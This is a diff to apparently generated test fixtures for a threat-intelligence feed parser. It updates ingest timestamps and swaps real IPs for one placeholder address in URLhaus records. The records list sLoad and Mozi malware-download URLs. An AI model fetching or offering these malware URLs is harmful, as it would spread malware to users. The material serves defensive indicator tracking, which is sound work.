@@ -5934,7 +5934,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692923948Z", + "ingested": "2021-12-13T08:40:08.025388400Z", "original": "{\"id\":\"961423\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961423/\",\"url\":\"https://ladiesincode.com/ladi/03635540234/it.gif\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -5980,7 +5980,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692927174Z", + "ingested": "2021-12-13T08:40:08.025395300Z", "original": "{\"id\":\"961424\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961424/\",\"url\":\"https://univirtek.com/viro/PLCSFN62B11D548Q/map.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6026,7 +6026,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692930470Z", + "ingested": "2021-12-13T08:40:08.025402200Z", "original": "{\"id\":\"961425\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961425/\",\"url\":\"https://univirtek.com/viro/03294650167/maps.jpg\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -6072,7 +6072,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692933536Z", + "ingested": "2021-12-13T08:40:08.025409200Z", "original": "{\"id\":\"961418\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961418/\",\"url\":\"https://univirtek.com/viro/GGLSCR73D17C627Q/blank.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6118,7 +6118,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692936612Z", + "ingested": "2021-12-13T08:40:08.025416100Z", "original": "{\"id\":\"961419\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961419/\",\"url\":\"https://univirtek.com/viro/CRRLRA68A70H501X/maps.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:48:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6164,7 +6164,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692939747Z", + "ingested": "2021-12-13T08:40:08.025422900Z", "original": "{\"id\":\"961420\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961420/\",\"url\":\"https://ladiesincode.com/ladi/CRSNLD59R12L840V/blank.jpg\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:48:03 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -6210,7 +6210,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692943084Z", + "ingested": "2021-12-13T08:40:08.025429800Z", "original": "{\"id\":\"961416\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961416/\",\"url\":\"https://belfetproduction.com/bella/RTTCRL58M29A794D/logo.css\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:47:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6256,7 +6256,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692946781Z", + "ingested": "2021-12-13T08:40:08.025436500Z", "original": "{\"id\":\"961417\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961417/\",\"url\":\"https://letonguesc.com/leto/04138120169/en.jpg\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:47:35 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6302,7 +6302,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692950037Z", + "ingested": "2021-12-13T08:40:08.025443400Z", "original": "{\"id\":\"961408\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961408/\",\"url\":\"https://letonguesc.com/leto/SPGMRC73H13A475I/it.jpg\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -6348,7 +6348,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692953293Z", + "ingested": "2021-12-13T08:40:08.025450300Z", "original": "{\"id\":\"961409\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961409/\",\"url\":\"https://letonguesc.com/leto/80007070552/it.png\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6394,7 +6394,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692956549Z", + "ingested": "2021-12-13T08:40:08.025457200Z", "original": "{\"id\":\"961410\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961410/\",\"url\":\"https://letonguesc.com/leto/02482130271/logo.png\",\"url_status\":\"offline\",\"host\":\"letonguesc.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6440,7 +6440,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692960025Z", + "ingested": "2021-12-13T08:40:08.025464Z", "original": "{\"id\":\"961411\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961411/\",\"url\":\"https://univirtek.com/viro/15730201009/uk.gif\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -6486,7 +6486,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692964023Z", + "ingested": "2021-12-13T08:40:08.025471Z", "original": "{\"id\":\"961412\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961412/\",\"url\":\"https://univirtek.com/viro/01074480250/maps.css\",\"url_status\":\"offline\",\"host\":\"univirtek.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6532,7 +6532,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692967850Z", + "ingested": "2021-12-13T08:40:08.025477900Z", "original": "{\"id\":\"961413\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961413/\",\"url\":\"https://cxminute.com/minu/SCHRKE77C47G224W/1x1.jpg\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6578,7 +6578,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692989280Z", + "ingested": "2021-12-13T08:40:08.025484900Z", "original": "{\"id\":\"961414\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961414/\",\"url\":\"https://cxminute.com/minu/04281560377/en.css\",\"url_status\":\"offline\",\"host\":\"cxminute.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -6624,7 +6624,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.692997035Z", + "ingested": "2021-12-13T08:40:08.025491800Z", "original": "{\"id\":\"961415\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961415/\",\"url\":\"https://ladiesincode.com/ladi/02613440060/maps.png\",\"url_status\":\"offline\",\"host\":\"ladiesincode.com\",\"date_added\":\"2021-01-14 20:47:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6670,7 +6670,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.693001654Z", + "ingested": "2021-12-13T08:40:08.025498700Z", "original": "{\"id\":\"961406\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961406/\",\"url\":\"https://nowyouknowent.com/werdona/PLLRRT83A05H501O/it.gif\",\"url_status\":\"offline\",\"host\":\"nowyouknowent.com\",\"date_added\":\"2021-01-14 20:47:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6716,7 +6716,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.693005431Z", + "ingested": "2021-12-13T08:40:08.025505500Z", "original": "{\"id\":\"961407\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961407/\",\"url\":\"https://hoagtechhydroponics.com/teco/LGTCDC74T45F205G/logo.png\",\"url_status\":\"offline\",\"host\":\"hoagtechhydroponics.com\",\"date_added\":\"2021-01-14 20:47:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -6762,7 +6762,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.693009007Z", + "ingested": "2021-12-13T08:40:08.025512400Z", "original": "{\"id\":\"961404\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961404/\",\"url\":\"https://belfetproduction.com/bella/00160060349/uk.jpg\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:42:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", @@ -6808,7 +6808,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.693023855Z", + "ingested": "2021-12-13T08:40:08.025519300Z", "original": "{\"id\":\"961405\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961405/\",\"url\":\"https://belfetproduction.com/bella/01288650243/1x1.jpg\",\"url_status\":\"offline\",\"host\":\"belfetproduction.com\",\"date_added\":\"2021-01-14 20:42:33 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"Cryptolaemus1\",\"larted\":\"false\",\"tags\":[\"sLoad\"]}", "category": "threat", "type": "indicator", 
@@ -6848,18 +6848,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://117.251.59.53:50611/bin.sh", + "original": "http://89.160.20.156:50611/bin.sh", "scheme": "http", "port": 50611, - "domain": "117.251.59.53", - "full": "http://117.251.59.53:50611/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50611/bin.sh" }, - "ip": "117.251.59.53" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693033143Z", - "original": "{\"id\":\"961403\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961403/\",\"url\":\"http://117.251.59.53:50611/bin.sh\",\"url_status\":\"online\",\"host\":\"117.251.59.53\",\"date_added\":\"2021-01-14 20:39:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", + "ingested": "2021-12-13T08:40:08.025526200Z", + "original": "{\"id\":\"961403\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961403/\",\"url\":\"http://89.160.20.156:50611/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:39:09 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"elf\",\"mips\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -6897,18 +6897,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://60.243.120.169:45371/Mozi.a", + "original": "http://89.160.20.156:45371/Mozi.a", "scheme": "http", "port": 45371, - "domain": "60.243.120.169", - "full": "http://60.243.120.169:45371/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:45371/Mozi.a" }, - "ip": "60.243.120.169" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693038312Z", - "original": "{\"id\":\"961402\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961402/\",\"url\":\"http://60.243.120.169:45371/Mozi.a\",\"url_status\":\"online\",\"host\":\"60.243.120.169\",\"date_added\":\"2021-01-14 20:36:14 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025533Z", + "original": "{\"id\":\"961402\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961402/\",\"url\":\"http://89.160.20.156:45371/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:14 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -6946,18 +6946,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.54.50.155:50093/Mozi.m", + "original": "http://89.160.20.156:50093/Mozi.m", "scheme": "http", "port": 50093, - "domain": "61.54.50.155", - "full": "http://61.54.50.155:50093/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50093/Mozi.m" }, - "ip": "61.54.50.155" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693042230Z", - "original": "{\"id\":\"961400\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961400/\",\"url\":\"http://61.54.50.155:50093/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.54.50.155\",\"date_added\":\"2021-01-14 20:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025539800Z", + "original": "{\"id\":\"961400\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961400/\",\"url\":\"http://89.160.20.156:50093/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -6995,18 +6995,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.95.175.109:36652/Mozi.m", + "original": "http://89.160.20.156:36652/Mozi.m", "scheme": "http", "port": 36652, - "domain": "59.95.175.109", - "full": "http://59.95.175.109:36652/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36652/Mozi.m" }, - "ip": "59.95.175.109" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693046137Z", - "original": "{\"id\":\"961401\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961401/\",\"url\":\"http://59.95.175.109:36652/Mozi.m\",\"url_status\":\"online\",\"host\":\"59.95.175.109\",\"date_added\":\"2021-01-14 20:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025546700Z", + "original": "{\"id\":\"961401\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961401/\",\"url\":\"http://89.160.20.156:36652/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -7044,18 +7044,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.235.65.235:54182/Mozi.m", + "original": "http://89.160.20.156:54182/Mozi.m", "scheme": "http", "port": 54182, - "domain": "42.235.65.235", - "full": "http://42.235.65.235:54182/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54182/Mozi.m" }, - "ip": "42.235.65.235" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693049574Z", - "original": "{\"id\":\"961397\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961397/\",\"url\":\"http://42.235.65.235:54182/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.235.65.235\",\"date_added\":\"2021-01-14 20:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025555600Z", + "original": "{\"id\":\"961397\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961397/\",\"url\":\"http://89.160.20.156:54182/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -7093,18 +7093,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.137.177.178:46048/Mozi.m", + "original": "http://89.160.20.156:46048/Mozi.m", "scheme": "http", "port": 46048, - "domain": "222.137.177.178", - "full": "http://222.137.177.178:46048/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46048/Mozi.m" }, - "ip": "222.137.177.178" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693053030Z", - "original": "{\"id\":\"961398\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961398/\",\"url\":\"http://222.137.177.178:46048/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.137.177.178\",\"date_added\":\"2021-01-14 20:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025562700Z", + "original": "{\"id\":\"961398\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961398/\",\"url\":\"http://89.160.20.156:46048/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -7142,18 +7142,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.137.232.114:33953/Mozi.m", + "original": "http://89.160.20.156:33953/Mozi.m", "scheme": "http", "port": 33953, - "domain": "222.137.232.114", - "full": "http://222.137.232.114:33953/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33953/Mozi.m" }, - "ip": "222.137.232.114" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693056456Z", - "original": "{\"id\":\"961399\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961399/\",\"url\":\"http://222.137.232.114:33953/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.137.232.114\",\"date_added\":\"2021-01-14 20:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025569900Z", + "original": "{\"id\":\"961399\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961399/\",\"url\":\"http://89.160.20.156:33953/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:36:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -7191,18 +7191,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://182.117.10.46:36447/Mozi.a", + "original": "http://89.160.20.156:36447/Mozi.a", "scheme": "http", "port": 36447, - "domain": "182.117.10.46", - "full": "http://182.117.10.46:36447/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36447/Mozi.a" }, - "ip": "182.117.10.46" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693059622Z", - "original": "{\"id\":\"961393\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961393/\",\"url\":\"http://182.117.10.46:36447/Mozi.a\",\"url_status\":\"online\",\"host\":\"182.117.10.46\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025576800Z", + "original": "{\"id\":\"961393\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961393/\",\"url\":\"http://89.160.20.156:36447/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -7240,18 +7240,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://171.38.193.49:36828/Mozi.m", + "original": "http://89.160.20.156:36828/Mozi.m", "scheme": "http", "port": 36828, - "domain": "171.38.193.49", - "full": "http://171.38.193.49:36828/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36828/Mozi.m" }, - "ip": "171.38.193.49" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693063560Z", - "original": "{\"id\":\"961394\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961394/\",\"url\":\"http://171.38.193.49:36828/Mozi.m\",\"url_status\":\"online\",\"host\":\"171.38.193.49\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025583700Z", + "original": "{\"id\":\"961394\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961394/\",\"url\":\"http://89.160.20.156:36828/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -7289,18 +7289,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://202.111.130.185:55281/Mozi.m", + "original": "http://89.160.20.156:55281/Mozi.m", "scheme": "http", "port": 55281, - "domain": "202.111.130.185", - "full": "http://202.111.130.185:55281/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55281/Mozi.m" }, - "ip": "202.111.130.185" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.693066836Z", - "original": "{\"id\":\"961395\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961395/\",\"url\":\"http://202.111.130.185:55281/Mozi.m\",\"url_status\":\"online\",\"host\":\"202.111.130.185\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.025590600Z", + "original": "{\"id\":\"961395\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961395/\",\"url\":\"http://89.160.20.156:55281/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 20:35:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
